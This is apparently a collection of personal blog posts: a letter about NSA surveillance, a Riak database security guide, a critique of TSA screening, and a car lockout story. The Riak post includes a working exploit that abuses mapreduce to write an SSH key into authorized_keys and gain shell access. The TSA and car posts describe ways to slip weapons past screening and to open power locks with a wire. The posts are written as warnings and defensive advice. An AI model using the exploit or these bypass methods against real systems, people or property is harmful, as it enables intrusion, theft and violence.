I wish I could make more concrete policy recommendations, but in this case all I can say is “this looks troubling.” Here’s the letter I sent to my representatives today:

Dear Senator Feinstein,

In 2006, we learned that the NSA had secretly tapped all internet traffic flowing through AT&T’s San Francisco peering point. Now, the Guardian’s leaks suggest that the NSA has accrued phone and email records–some metadata, some full content–for millions of US citizens, and stored them for targeted analysis. The criteria for retention and analysis remain poorly understood.

In response to Senator Wyden’s inquiry as to whether the NSA was gathering “any type of data at all on millions or hundreds of millions of Americans,” Directory Clapper answered “No,” then, “Not wittingly.” His recent letter admits this was a misleading statement at best.

We know that surveillance is rarely as clean as intended. In 2008, two NSA whistleblowers independently reported that the NSA routinely intercepted the satellite phone conversations of American citizens in the Middle East, including military personell and journalists. Faulk alleged that he and others inthe NSA’s Fort Gordon facility often shared deeply personal phone calls with office mates.

“Hey check this out, there’s good phone sex,” Faulk quoted, “or there’s some pillow talk, pull up this call, it’s really funny, go check it out. It would be some colonel making pillow talk and we would say, ‘Wow, this was crazy’.”

Kinne alleged that the NSA intercepted hundreds of private conversations between American aid workers. “They were identified in our systems as ‘belongs to the International Red Cross’ and all these other organizations. And yet, instead of blocking these phone numbers we continued to collect on them.”

In the Guardian’s release of an unfinished report on Stellar Wind, the NSA admits that even its internal oversight on signal intelligence has been complicated by secrecy constraints:

“Second, in March 2003, the IG advised General Hayden that he should report violations of the Authorization to the President. In February of 2003, the OIG learned of PSP incidents or violations that had not been reported to overseers as required, because none had the clearance to see the report.”

Establishing the constitutionality of FISA activity appears fraught with absurd legal difficulties. In response to an FOIA request made by the Electronic Frontier Foundation, the Justice Department located an an 86-page opinion of the FISA court which held the government’s surveillance activity had been “improper or unconstitutional”–but refused to release it, because it was classified. Subsequently, the Justice Department argued that that opinion was controlled by the FISA court and could only be released through that court.

Meanwhile, the American Civil Liberties Union had asked the FISA court to release an opinion, and the FISA court instructed them to take the matter to the Justice Department instead!

Given Senators Wyden and Udall’s continued concerns over the truthfulness of the NSA’s statements to the public and to Congress; given the alarming allegations of whistleblowers, and given the history of state surveillance, I must express my concern. Much of the information we need to come to an informed decision is too classified to discuss, and what we can discuss appears inconsistent with a democracy predicated on the free exchange of ideas.

I recognize that we must balance the objective of security (and the commensurate need for secrecy) with the goals of individual liberty and public accountability. To argue in absolutes would foil any attempt to produce workable public policy.

As a citizen who believes in the US’s ideals and messy reality alike, I urge you to understand my deep apprehension about monitoring private communications, and to find on our behalf a reasoned, carefully considered set of policy decisions. Please give this matter your strong consideration; I believe it to be of fundamental importance.

Thank you for your time.

–Kyle Kingsbury

Microsoft released this little gem today, fixing a bug which allowed remote code execution on all Windows Vista, 6, and Server 2008 versions.

...allow remote code execution if an attacker sends a continuous flow of specially crafted UDP packets to a closed port on a target system.

Meanwhile, in an aging supervillain's cavernous lair...

Major thanks to John Muellerleile (@jrecursive) for his help in crafting this.

Actually, don't expose pretty much any database directly to untrusted connections. You're begging for denial-of-service issues; even if the operations are semantically valid, they're running on a physical substrate with real limits.

Riak, for instance, exposes mapreduce over its HTTP API. Mapreduce is code; code which can have side effects; code which is executed on your cluster. This is an attacker's dream.

For instance, Riak reduce phases are given as a module, function name, and an argument. The reduce is called with a list, which is the output of the map phases it is aggregating. There are a lot of functions in Erlang which look like

module:fun([any, list], any_json_serializable_term).

But first things first. Let's create an object to mapreduce over.

curl -X PUT -H "content-type: text/plain" \ http://localhost:8098/riak/everything_you_can_run/i_can_run_better --data-binary @-<<EOF Riak is like the Beatles: listening has side effects. EOF

Now, we'll perform a mapreduce query over this single object. Riak will execute the map function once and pass the list it returns to the reduce function. The map function, in this case, ignores the input and returns a list of numbers. Erlang also represents strings as lists of numbers. Are you thinking what I'm thinking?

curl -X POST -H "content-type: application/json" \ http://databevy.com:8098/mapred --data @-<<\EOF {"inputs": [ ["everything_you_can_run", "i_can_run_better"] ], "query": [ {"map": { "language": "javascript", "source": " function(v) { // "/tmp/evil.erl" return [47,116,109,112,47,101,118,105,108,46,101,114,108]; } " }}, {"reduce": { "language": "erlang", "module": "file", "function": "write_file", "arg": " SSHDir = os:getenv(\"HOME\") ++ \"/.ssh/\".\n SSH = SSHDir ++ \"authorized_keys\".\n filelib:ensure_dir(os:getenv(\"HOME\") ++ \"/.ssh/\").\n file:write_file(SSH, <<\"ssh-rsa SOME_PUBLIC_SSH_KEY= Fibonacci\\n\">>).\n file:change_mode(SSHDir, 8#700).\n file:change_mode(SSH, 8#600).\n file:delete(\"/tmp/evil.erl\"). " }} ] } EOF

See it? Riak takes the lists returned by all the map phases (/tmp/evil.erl), and calls the Erlang function file:write_file("/tmp/evil.erl", Arg). Arg is our payload, passed in the reduce phase's argument. That binary string gets written to disk in /tmp.

The payload can do anything. It can patch the VM silently to steal or corrupt data. Crash the system. Steal the cookie and give you a remote erlang shell. Make system calls. It can do this across all machines in the cluster. Here, we take advantage of the fact that the riak user usually has a login shell enabled, and add an entry to .ssh/authorized_hosts.

Now we can use the same trick with another 2-arity function to eval that payload in the Erlang VM.

curl -X POST -H "content-type: application/json" \ http://databevy.com:8098/mapred --data @-<<\EOF {"inputs": [ ["everything_you_can_run", "i_can_run_better"]], "query": [ {"map": { "language": "javascript", "source": " function(v) { return [47,116,109,112,47,101,118,105,108,46,101,114,108]; } " }}, {"reduce": { "language": "erlang", "module": "file", "function": "path_eval", "arg": "/tmp/evil.erl", }} ] }

Astute readers may recall path_eval ignores its first argument if the second is a file, making the value of the map phase redundant here.

You can now ssh to riak@some_host using the corresponding private key. The payload /tmp/evil.erl removes itself as soon as it's executed, for good measure.

This technique works reliably on single-node clusters, but could be trivially extended to work on any number of nodes. It also doesn't need to touch the disk; you can abuse the scanner/parser to eval strings directly, though it's a more convoluted road. You might also abuse the JS VM to escape the sandbox without any Erlang at all.

In summary: don't expose a database directly to attackers, unless it's been designed from the ground up to deal with multiple tenants, sandboxing, and resource allocation. These are hard problems to solve in a distributed system; it will be some time before robust solutions are available. Meanwhile, protect your database with a layer which allows only known safe operations, and performs the appropriate rate/payload sanity checking.

The riak-users list receives regular questions about how to secure a Riak cluster. This is an overview of the security problem, and some general techniques to approach it.

Theory

You can skip this, but it may be a helpful primer.

Consider an application composed of agents (Alice, Bob) and a datastore (Store). All events in the system can be parameterized by time, position (whether the event took place in Alice, Bob, or Store), and the change in state. Of course, these events do not occur arbitrarily; they are connected by causal links (wires, protocols, code, etc.)

If Alice downloads a piece of information from the Store, the two events E (Store sends information to Alice) and F (Alice receives information from store) are causally connected by the edge EF. The combination of state events with causal connections between them comprises a directed acyclic graph.

A secure system can be characterized as one in which only certain events and edges are allowed. For example, only after a nuclear war can persons on boats fire ze missiles.

A system is secure if all possible events and edges fall within the proscribed set. If you're a weirdo math person you might be getting excited about line graphs and dual spaces and possibly lightcones but... let's bring this back to earth.

Authentication vs Authorization

Authentication is the process of establishing where these events are taking place, in system space. Is the person or agent on the other end of the TCP socket really Alice? Or is it her nefarious twin? Is it the Iranian government?

Authorization is the problem of deciding what edges are allowed. Can Alice download a particular file? Can Bob mark himself as a publisher?

You can usually solve these problems independently of one another.

Asymmetric cryptography combined with PKI allows you to trust big entities, like banks with SSL certificates. Usernames with expensively hashed, salted passwords can verify the repeated identity of a user to a low degree of trust. Oauth providers (like Facebook and Twitter), or OpenID also approach web authentication. You can combine these methods with stronger systems, like RSA secure tokens, challenge-response over a second channel (like texting a code to the user's cell phone), or one-time passwords for higher guarantees.

Authorization tends to be expressed (more or less formally) in code. Sometimes it's called a policy engine. It includes rules saying things like "Anybody can download public files", "a given user can read their own messages", and "only sysadmins can access debugging information".

Strategies

There are a couple of common ways that security can fail. Sometimes the system, as designed, allows insecure operations. Perhaps a check for user identity is skipped when accessing a certain type of record, letting users view each other's paychecks. Other times the abstraction fails; the SSL channel you presumed to be reliable was tapped, allowing information to flow to an eavesdropper, or the language runtime allows payloads from the network to be executed as code. Thus, even if your model (for instance, application code) is provably correct, it may not be fully secure.

As with all abstractions on unreliable substrates, any guarantees you can make are probabilistic in nature. Your job is to provide reasonable guarantees without overwhelming cost (in money, time, or complexity). And these problems are hard.

There are some overall strategies you can use to mitigate these risks. One of them is known as defense in depth. You use overlapping systems which prevent insecure things from happening at more than one layer. A firewall prevents network packets from hitting an internal system, but it's reinforced by an SSL certificate validation that verifies the identity of connections at the transport layer.

You can also simplify building secure systems by choosing to whitelist approved actions, as opposed to blacklisting bad ones. Instead of selecting evil events and causal links (like Alice stealing sensitive data), you enumerate the (typically much smaller) set of correct events and edges, deny all actions, then design your system to explicitly allow the good ones.

Re-use existing primitives. Standard cryptosystems and protocols exist for preventing messages from being intercepted, validating the identity of another party, verifying that a message has not been tampered with or corrupted, and exchanging sensitive information. A lot of hard work went into designing these systems; please use them.

Create layers. Your system will frequently mediate between an internal high-trust subsystem (like a database) and an untrusted set of events (e.g. the internet). Between them you can introduce a variety of layers, each of which can make stricter guarantees about the safety of the edges between events. In the case of a web service:

  1. TCP/IP can make a reasonable guarantee that a stream is not corrupted.
  2. The SSL terminator can guarantee (to a good degree) that the stream of bytes you've received has not been intercepted or tampered with.
  3. The HTTP stack on top of it can validate that the stream represents a valid HTTP request.
  4. Your validation layer can verify that the parameters involved are of the correct type and size.
  5. An authentication layer can prove that the originating request came from a certain agent.
  6. An authorization layer can check that the operation requested by that person is allowed
  7. An application layer can validate that the request is semantically valid--that it doesn't write a check for a negative amount, or overflow an internal buffer.
  8. The operation begins.

Minimize trust between discrete systems. Don't relay sensitive information over channels that are insecure. Force other components to perform their own authentication/authorization to obtain sensitive data.

Minimize the surface area for attack. Write less code, and have less ways to interact with the system. The fewer pathways are available, the easier they are to reinforce.

Finally, it's worth writing evil tests to experimentally verify the correctness of your system. Start with the obvious cases and proceed to harder ones. As the complexity grows, probabilistic methods like Quickcheck or fuzz testing can be useful.

Databases

Remember those layers of security? Your datastore resides at the very center of that. In any application which has shared state, your most trusted, validated, safe data is what goes into the persistence layer. The datastore is the most trusted component. A secure system isolates that trusted zone with layers of intermediary security connecting it to the outside world.

Those layers perform the critical task of validating edges between database events (e.g. store Alice's changes to her user record) and the world at large (e.g. alice submits a user update). If your security model is completely open, you can expose the database directly to the internet. Otherwise, you need code to ensure these actions are OK.

The database can do some computation. It is, after all, software. Therefore it can validate some actions. However, the datastore can only discriminate between actions at the level of its abstraction. That can severely limit its potential.

For instance, all datastores can choose to allow or deny connections. However, only relational stores can allow or deny actions on the the basis of the existence of related records, as with foreign key constraints. Only column-oriented stores can validate actions on the basis of columns, and so forth.

Your security model probably has rules like "Only allow HR employees to read other employee's salaries" and "Only let IT remove servers". These constructs, "HR employees", "Salaries", "IT", "remove", and "servers" may not map to the datastore's abstraction. In a key-value store, "remove" can mean "write a copy of a JSON document without a certain entry present". The key-value store is blind to the contents of the value, and hence cannot enforce any security policies which depend on it.

In almost every case, your security model will not be embeddable within the datastore, and the datastore cannot enforce it for you. You will need to apply the security model at least partially at a higher level.

Doing this is easy.

Allow only trusted hosts to initiate connections to the database, using firewall rulesets. Usenames and passwords for database connections typically provide little additional security, as they're stored in dozens of places across the production environment. Relying on these credentials or any authorization policy linked to them (e.g. SQL GRANT) is worthless when you assume your host, or even client software, has been compromised. The attacker will simply read these credentials from disk or off the wire, or exploit active connections in software.

On trusted hosts, between the datastore and the outside world, write the application which enforces your security model. Separate layers into separate processes and separate hosts, where reasonable. Finally, untrusted hosts connect these layers to the internet. You can have as many or as few layers as you like, depending on how strongly you need to guarantee isolation and security.

Putting it all together

Lets sell storage in Riak to people, over the web. We'll present the same API as Riak, over HTTP.

Here's a security model: Only traffic from users with accounts is allowed. Users can only read and write data from their respective buckets, which are transparently assigned on write. Also, users should only be able to issue x requests/second, to prevent them from interfering with other users on the cluster.

We're going to presuppose the existence of an account service (perhaps Riak, mysql, whatever) which stores account information, and a bucket service that registers buckets to users.

  1. Internet. Users connect over HTTPS to an application node.
  2. The HTTPS server's SSL acceptor decrypts the message and ensures transport validity.
  3. The HTTP server validates that the request is in fact valid HTTP.
  4. The authentication layer examines the HTTP AUTH headers for a valid username and password, comparing them to bcrypt-hashed values on the account service.
  5. The rate limiter checks that this user has not made too many requests recently, and updates the request rate in the account service.
  6. The Riak validator checks to make sure that the request is a well-formed request to Riak; that it has the appropriate URL structure, accept header, vclock, etc. It constructs a new HTTP request to forward on to Riak.
  7. The bucket validator checks with the bucket service to see if the bucket to be used is taken. If it is, it verifies that the current authenticated user matches the bucket owner. If it isn't, it registers the bucket.
  8. The application node relays the request over the network to a Riak node.
  9. Riak nodes are allowed by the firewall to talk only to application nodes. The Riak node executes the request and returns a response.
  10. The response is immediately returned to the client.

Naturally, this only works for certain operations. Mapreduce, for instance, excecutes code in Riak. Exposing it to the internet is asking for trouble. That's why we need a Riak validation layer to ensure the request is acceptable; it can allow only puts and gets.

Happy hacking

I hope this gives you some idea of how to architect secure applications. Apologies for the shoddy editing--I don't have time for a second pass right now and wanted to get this out the door. Questions and suggestions in the comments, please! :-)

Hello, law enforcement. I suspect you're reading this because, as a TSA supervisor told me recently, "... we are interested in you".

Yes, I asked to fly selectee--to not provide ID--at Denver International recently. Yes, I've done this before. Yes, there was a lot of confusion between TSA employees on whether that was legal or not--eventually M. Gatling of the DIA police told me I was required to display ID. Yes, I opted out of AIT. Yes, it did take no fewer than eight TSA officers, airline representatives, and police about 45 minutes to determine I posed no threat. Yes, I was exceedingly polite, and most of us got along quite well. Yes, I was asked all kinds of questions I was under no obligation to answer (among them my address and phone number), and no, the TSA supervisor was not very pleased that I asked whether I was legally required to respond.

"What is your contact number."

"Am I legally required to give that information?"

"I'm asking you."

"Well, that much is clear."

"What is your contact number."

"Am I required to tell you?"

"I'm asking."

...

To cut to the chase: no, I am not a terrorist. No, I have no interest in harming anyone. Quite the opposite, in fact. If you're interested in why I disagree with the screening system, my reasoning is simple; the screening process is not sufficient to detect probable threats, yet incurs disproportionate social and monetary costs.

The costs are obvious: long wait times, missed flights, lost items, and depending on your personal views, dignity. Some people are not okay, for a variety of powerful reasons, with having their body touched everywhere. The question is, are these costs proportionate and acceptable given the process' effect on the probability distribution of bad events--i.e., to what extent it prevents people from crashing planes into buildings.

I believe the answer is no. The TSA's strategy for passenger screening has been primarily reactive, not anticipatory. The organization simply doesn't think ahead to consider probable threats. Consider that we only started to remove shoes for screening after Richard Reid's attempt to light his shoes on fire in 2001. Similarly, we only began limiting liquids after the 2006 UK bombing plot. Toner cartridges? Same story.

The problem is not necessarily that these systems fail to prevent the attacks they are designed to combat--it's that they do not address other, previously unexploited avenues of attack. The specific failures in these systems include:

  1. The pat-down is insufficiently aggressive. I've opted out of AIT several times and received their pat-down. They don't reach between the buttocks, nor do they check behind the scrotum. I'm a relatively trim person. Someone with significant body fat could likely conceal a reasonably sized weapon in this area and avoid detection. The only explanation I can conceive of is that the TSA has modified their pat-down to prevent public exasperation. You have to lift and separate. Sorry guys.

  2. X-ray screeners fail to notice restricted items, let alone real threats. I know dozens of people who have accidentally carried scissors, nails, knives, and large volumes of liquid onto planes. Moreover, the TSA admits that it has difficulty detecting partial explosive devices. Screeners routinely fail bomb drills.

  3. Metal detectors are still the principal line of defense at many airports. They fail to detect ceramic and glass weapons. You can pick up quite nasty ceramic blades at any cooking store. For that matter, metal detectors also can't detect several types of weakly paramagnetic metals, like titanium.

  4. Terahertz radiation has a 90% penetration depth of a few centimeters at best. That means it can't detect objects concealed in body cavities, or, for that matter, implanted objects.

  5. Even backscatter x-rays with a significant penetrating distance won't be able to distinguish between medical implants and weapons--as the new software only reports anomalies for physical screening.

In addition, there are two systemic problems making threat prevention difficult:

  1. Because passengers are not forced to undergo screening during transfers, the safety of the entire US air system is limited to that of the weakest connecting airport.

  2. Because not all screening methods are applied to every passenger, and because the methods used can be deterministically altered by passenger action (e.g. refusing AIT screening, choosing to enter security during high load times, selecting which airport to enter), large threat classes that could be prevented can go unnoticed.

Even if all screening methods were used in concert at all airports, internal weakly-magnetic weapons would still go undetected. Yeah, it sounds crazy; but we're talking about people willing to kill themselves on planes. Who does that? Even if we hadn't prevented any of the publically reported terrorist attacks in the last ten years, you'd be more likely by an order of magnitude to die as a result of mechanical failure or pilot error than by terrorism!

I probably shouldn't mention that queueing hundreds to thousands of people in small spaces before screening probably isn't the safest way to do things, either.

Moreover, there are several types of legitimate objects which cannot be reasonably screened. Motorized wheelchairs, for example, can contain a hundred amp-hours at 12 volts, or 4.32 * 106 joules. That's about as much energy as a kilogram of TNT.

On top of all this, security personnel, pilots, and cargo aren't held to anywhere near the same level of screening. The TSA, however, seems more concerned with suppressing criticism than actually preventing attacks. Our reaction to whistleblowers like Robert Cravens, who reported hundreds of pounds of flammable materials being stored improperly, or Chris Liu, who posted a video of airport security failures to youtube, has been, well, less than congratulatory. As their Human Resources department says, "because it is illegal to retaliate at the TSA there is no need to maintain an office for complaints."

The funny thing is that these objections are obvious. I'm sure there are entire teams of people in the DHS and elsewhere fighting to improve the safety of flights, and that they are raising exactly these concerns. I can only conclude that their efforts have been buried by bureaucracy or dismissed due to conflicting ideologies.

I'm not trying to say we should do away with airport security. I'm saying that if we're going to spend $8.1 billion annually, we might focus on more likely threats. We simply cannot prevent sufficiently determined attackers from killing people on planes. What we should do is focus on in-depth, comprehensive risk management.

That means taking a page from Israel's book, where terrorist attacks actually happen on a regular basis. It means asking people questions, watching their behavior carefully, and other types of soft assessment. It means making it difficult to actually hijack the plane: reinforced cockpit doors, failsafe flight controls, and rapid scrambling of fighters. It means continuing to increase the presence of air marshals. We've made great progress in implementing these layers of security.

In fact, given that modern passenger aircraft are basically capable of taking off, flying, and landing completely under computer control, it seems entirely feasible (and indeed, I would be shocked if nobody were currently developing this) to make planes which simply cannot be hijacked or crashed into structures. At the first sign of hijacking, both pilot and copilot sign off on a failsafe landing mode. The plane does not permit manual override of its controls, finds the nearest airport, and touches down. A more passive layer of this software could simply prevent the aircraft from entering a flight corridor which could lead to collision with a major metropolitan area. Even if these safety modes are ten times more likely to cause crashes than manual control, it's an improvement over the likely outcome of hijacking--and completely eliminates the hostage value of the passengers. There would simply be no incentive to commandeer a plane.

It also means means spending more money on good screeners, and training them to recognize more than the demo bombs on their screens. It means establishing stronger cultural and physical constraints on trusted employees, and raising the bar on background checks.

We can also mitigate threats through cultural systems. After 9/11, passengers are aware that they have significant impact on the outcome of a hijacking. We should encourage people to yell when their neighbors light their shoes on fire, and tackle them if they try to pull a weapon. It's an experimentally proven and cheap way to prevent deaths.

In summary, the present TSA process fails to address a variety of realistic threats while placing undue focus on the specific attack modes we've already seen, at significant cost to the public. I disagree with this process, and opt out.

Carrie (one of my summer housemates) locked herself out of her car earlier this week. She gave Justin and I a call, asking us to contact a local locksmith. Rather than go to the expense of calling a locksmith after hours, we offered to try to break in first.

I'd never tried, or really thought about, breaking into a car before. I don't drive my car very often, and I don't tend to leave my keys behind, so it had never really occurred to me that I might need to know how, but here was a chance to find out. We stopped by the house, picked up a wire coat hanger and a pair of wire cutters, and drove out to the store she had parked in front of. "Thank goodness you're here," she exclaimed, and showed us her key-containing purse, neatly tucked away on the back seat.

I unbent the coat hanger and snipped off the twisted end. The door locks were the pull-type, small vertical posts that, in their locked state, remained safely recessed within the door body. There was no chance of extracting them from above, barring the use of strong adhesives, but I imagined that it might be possible to catch whatever locking mechanism connected those posts to the door lock by inserting a hooked wire into the door body at the midline window seal. Then Carrie offered that she had power locks.

"Oh!" We stood up to examine the door body from the top of the passenger-side window. Indeed, a three-way rocker button was situated, out of passing view, in the door's armrest. Even better, the button faced up--it would only be necessary to depress it to open the lock. I inserted the coat hanger into the weatherstripping at the top of the door, where it met the metal just above the window. It slid easily through and down to the seat, but I couldn't direct it back towards the door frame. Removing the wire and making a quick bend rectified that situation, and I pressed the button easily.

All in all, the process took about 3 minutes and caused no visible damage. Now that I know what to do and where to look, I could unlock a similar vehicle in perhaps as little as 15 seconds. Whoah! I always thought it would take a lot of time to break into a car--at least five minutes--so somebody would notice what you were doing. Or if you did it fast, you'd need to break a window or do something else noticeably violent. Yet this was fast, easy, and nobody asked us any questions. It would be harder to steal a bicycle. Suffice it to say, I'm not trusting my valuables to any car that might be a target from now on.

With that experience in mind, here's what I plan to look for (or modify) when I buy a new car. (If you are a car designer, please take note!)

Doors
  1. I haven't tested any other vehicles, but some cars may not let you insert a coat hanger through the door at all. Try the weatherstripping at the glass, at the metal, and at the door gap.
Physical locking mechanisms
  1. Physical locks should offer as little mechanical purchase as possible. The post-type is hard to open with this method because it is smooth and has no corners to pull on.
  2. Locks should take some force to open. It's hard to apply a lot of force through a wire, except when pulling forward or upward.
  3. If the lock offers something to pull on, it should not pull up or forward. In to and away from the door are the hardest directions to manipulate with something going through the weatherstripping.
  4. A physical lock should be hard to see from outside the vehicle. That makes it more difficult to aim attempts to open it.
Power locks
  1. If the vehicle has power locks, under no circumstances should they offer buttons that press down! Pushing in towards the door or pulling out towards the chair is probably the safest.
  2. If there are buttons, they most definitely should not be concave! This particular switch had a convex lock and a concave unlock surface: merely touching the lock directs the wire right on target. A convex surface is harder to press, but likely not impossible.

Of course, no vehicle is immune to lock-picking or POWS (plain-old-window-smashing), so your best bet is always to bring your valuable items with you, and keep any existing items hidden. If your car isn't as much of a target, it dramatically enhances the ability of your security measures to do their job. :-)

Stay safe!

Copyright © 2014 Kyle Kingsbury.
Non-commercial re-use with attribution encouraged; all other rights reserved.
Comments are the property of respective posters.